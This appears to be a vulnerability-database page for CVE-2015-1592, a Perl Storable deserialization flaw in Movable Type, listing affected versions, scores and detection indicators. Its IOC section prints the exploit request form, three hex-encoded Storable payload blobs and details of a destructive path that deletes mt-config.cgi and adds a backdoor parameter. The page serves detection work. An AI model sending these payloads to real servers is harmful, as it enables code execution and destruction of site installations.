cbcvebase.
CVE-2015-1592
published 2015-02-19

CVE-2015-1592: Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which…

PriorityP271high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
75.03%
99.4th percentile
Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.

Affected

3 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
sixapartmovable_type>= 5.2.0 < 5.2.125.2.12
sixapartmovable_type>= 6.0 < 6.0.76.0.7

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/mt/mt-wizard.cgi
pathmt-wizard.cgi
pathmt.cgi
filenamemt-config.cgi
command__mode=retry&step=configure&config=<serialized_storable_payload>
bytes
53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078
bytes
534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769
bytes
5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f
  • Detect GET requests to mt-wizard.cgi with query parameters '__mode=retry', 'step=configure', and a 'config' parameter beginning with the Storable magic bytes 'SERG' (hex: 53455247) — this is the serialized payload delivery vector for CVE-2015-1592.
  • Alert on HTTP responses containing the string "Can't locate XXXCHECKXXX.pm" — this indicates the server is vulnerable and the attacker is performing an active check for CVE-2015-1592.
  • Monitor for GET requests to mt-wizard.cgi with '__mode=next_step' and 'step=optional' containing injected Perl code in the 'email_address_main' parameter (newline-separated ObjectDriver injection).
  • Detect GET requests to mt.cgi with an 'xyzzy' query parameter — this is the backdoor command execution parameter written into the corrupted mt-config.cgi during the destructive exploit path.
  • Flag any HTTP request to MovableType CGI endpoints where the 'config' parameter value decodes (hex) to a binary blob starting with 'SERG' followed by null bytes — this is the Storable serialization magic header used in the exploit.
  • The nondestructive exploit payload hex-encodes a Storable object referencing 'Object::MultiType', 'DateTime', 'Try::Tiny::ScopeGuard', and calls 'MT::run_app' — look for these class names in decoded 'config' parameter values.
  • The destructive exploit path deletes mt-config.cgi via a CGITempFile Storable injection — monitor for unexpected deletion or modification of mt-config.cgi on the server filesystem.
  • ·The nondestructive exploit path requires the target server to have 'Object::MultiType' and 'DateTime' Perl modules installed in @INC; if absent, the exploit will fail silently without corrupting the installation.
  • ·The destructive exploit path only requires standard MovableType dependencies (CGI module) but will corrupt the MovableType installation by unlinking and rewriting mt-config.cgi.
  • ·Affected versions are Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7; patched versions are not vulnerable.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.